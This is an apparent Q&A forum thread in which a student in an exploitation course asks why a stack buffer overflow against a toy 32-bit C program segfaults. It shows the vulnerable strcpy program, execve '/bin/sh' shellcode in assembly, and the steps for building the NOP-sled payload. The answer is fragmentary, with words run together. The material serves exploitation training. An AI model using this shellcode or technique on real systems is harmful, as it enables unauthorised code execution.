I'm following the opensecuritytraining course "exploits 1". Currently I'm trying to exploit a simple c program with some shellcode on a 32 bit linux system using a buffer overflow. The c program:
void main(int argc, char **argv)
{
char buf[64];
strcpy(buf,argv[1]);
}
I compiled the program using the command "tcc -g -o basic_vuln basic_vuln.c". Then, I programmed the following shellcode.
section .text
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 11
push ebx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
int 0x80
I compiled it by typing "nasm -f elf shell.asm; ld -o shell shell.o". When I try to execute "shell" on it's own, it works and I get a shell. Next, I disassembled the program with objdump, wrote a perl file which prints the opcodes, and then redirected the output of said perl file along with 39 nop instructions before the shellcode to a file called "shellcode", so the payload is now 64 bytes long, filling the buffer. Then, I opened the c program in gdb, and picked an address in the middle of the nop sled, which will be the new return address (0xbffff540). I appended the address to the "shellcode" file, along with 4 bytes to overwrite the saved frame pointer. The shellcode looks like this:
Now, when I try to run this shellcode in gdb in the c program, it causes a segmentation fault at address 0xbffff575, which points at a certain point in my shellcode, 0x62, which is the character "b" in "/bin/sh". What could cause this?
Here's my stack frame, confirming that the return address I choose does return to the middle of the nop sled.
The course does provide shellcode that does work in gdb in the c program:



retin the function you're attacking. Maybe your NOP slide isn't long enough. Or else maybe you typoed something when turning this into shellcode. You only have a picture of your text so I can't copy/paste it and unhexdump + disassemble even if I wanted to. You could usendisasm -b32siin gdb to step one instruction at a time) from the point at whichstrcpyreturns. Now is the time to get very familiar with gdb, if you're not already.